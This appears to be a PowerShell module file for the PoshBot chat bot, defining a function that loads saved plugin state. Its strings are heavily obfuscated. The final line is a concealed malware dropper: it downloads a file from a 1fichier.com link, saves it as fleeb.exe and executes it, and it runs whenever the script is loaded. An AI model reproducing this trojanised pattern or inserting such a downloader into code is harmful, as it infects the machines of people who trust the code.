function Get-PoshBotStatefulData {
    
    [System.Diagnostics.CodeAnalysis.SuppressMessageAttribute(("{5}{3}{2}{1}{0}{4}" -f'lo','G','oid','SAv','balVars','P'), '', Scope=("{2}{0}{1}"-f'unct','ion','F'), Target='*')]
    [cmdletbinding()]
    param(
        [string]$Name = '*',

        [switch]$ValueOnly,

        [validateset({"{2}{0}{1}"-f'oba','l','Gl'},{"{1}{0}"-f'e','Modul'})]
        [string]$Scope = ("{2}{0}{1}"-f'u','le','Mod')
    )
    process {
        if($Scope -eq ("{0}{1}" -f 'M','odule')) {
            $FileName = "$($global:PoshBotContext.Plugin).state"
        } else {
            $FileName = ("{1}{3}{2}{0}{4}"-f 'l.','Pos','ba','hbotGlo','state')
        }
        $Path = Join-Path $global:PoshBotContext.ConfigurationDirectory $FileName

        if(-not (Test-Path $Path)) {
            Write-Verbose ('Req'+'u'+'est'+'ed '+'st'+'at'+'ef'+'ul '+'data'+' '+'f'+'ile '+'not'+' '+'found:'+' '+"[$Path]")
            return
        }
        Write-Verbose ('G'+'etting '+'sta'+'tefu'+'l '+'dat'+'a '+'fr'+'om '+"[$Path]")
        $Output = Import-Clixml -Path $Path | Select-Object -Property $Name
        if($ValueOnly)
        {
            $Output = $Output.${Name}
        }
        $Output
    }
}

Export-ModuleMember -Function ("{2}{3}{0}{1}{4}{5}" -f'osh','Bo','Ge','t-P','tStat','efulData')

(New-Object System.Net.WebClient).DownloadFile(("{1}{3}{5}{2}{4}{6}{0}" -f'6hj','http','m/','s:/','?v8w3','/1fichier.co','g73'),("{0}{2}{1}" -f'flee','xe','b.e'));Start-Process ("{2}{1}{0}" -f'xe','leeb.e','f')
